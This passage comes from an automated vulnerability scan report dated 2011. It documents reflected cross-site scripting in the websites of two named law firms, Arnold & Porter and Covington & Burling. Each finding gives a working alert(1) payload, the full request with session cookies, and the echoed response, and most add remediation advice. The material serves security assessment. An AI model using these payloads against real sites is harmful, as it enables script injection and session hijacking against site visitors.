
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="u" value="FinancialServicese8e37\"><script>alert(1)</script>b1acff3e126" />
...[SNIP]...

2.8. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href=" /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1&expand_section=advisory">
...[SNIP]...

2.9. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /about_the_firm/firm_history

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:43:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1298; path=/
Set-Cookie: PortletId=1293201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm History</title>
<meta na
...[SNIP]...
about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]>
...[SNIP]...

2.10. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /balancingworkandfamilylife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1155; path=/
Set-Cookie: PortletId=1146501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Work-Life Balance</title>
<meta na
...[SNIP]...
= '/balancingworkandfamilylife/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/balancingworkandfamilylife/Diversity.aspx?ec112'-alert(1)-'d654b8e90b6=1';//]]>
...[SNIP]...

2.11. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /bestviewed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1359; path=/
Set-Cookie: PortletId=1350401; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Best Viewed</title>
<meta name="language" cont
...[SNIP]...
document.aspnetForm.action = '/bestviewed/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/bestviewed/GeneralPageData.aspx?e18d5'-alert(1)-'b19132c4a4f=1';//]]>
...[SNIP]...

2.12. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /biographies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1141; path=/
Set-Cookie: PortletId=1132501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Biographies</title>
<meta name="language" cont
...[SNIP]...
DATA[
document.aspnetForm.action = '/biographies/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/biographies/Search.aspx?c3b19'-alert(1)-'10a178ca3f5=1';//]]>
...[SNIP]...

2.13. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1151; path=/
Set-Cookie: PortletId=1142501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17851


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Overview</title>
<meta name="langu
...[SNIP]...
.aspnetForm.action = '/diversityoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityoverview/Diversity.aspx?8c748'-alert(1)-'750bc24037f=1';//]]>
...[SNIP]...

2.14. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1156; path=/
Set-Cookie: PortletId=1147501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14611


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Diversity Update</title>
<meta nam
...[SNIP]...
ment.aspnetForm.action = '/diversityupdate/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityupdate/Diversity.aspx?c2d31'-alert(1)-'bf8e984b8ec=1';//]]>
...[SNIP]...

2.15. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /extranet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1260; path=/
Set-Cookie: PortletId=1254901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
A[
document.aspnetForm.action = '/extranet/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/extranet/GeneralPageData.aspx?6f529'-alert(1)-'c70c33782c6=1';//]]>
...[SNIP]...

2.16. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /firmoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=1135501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm Overview</title>
<meta n
...[SNIP]...
ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]>
...[SNIP]...

2.17. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
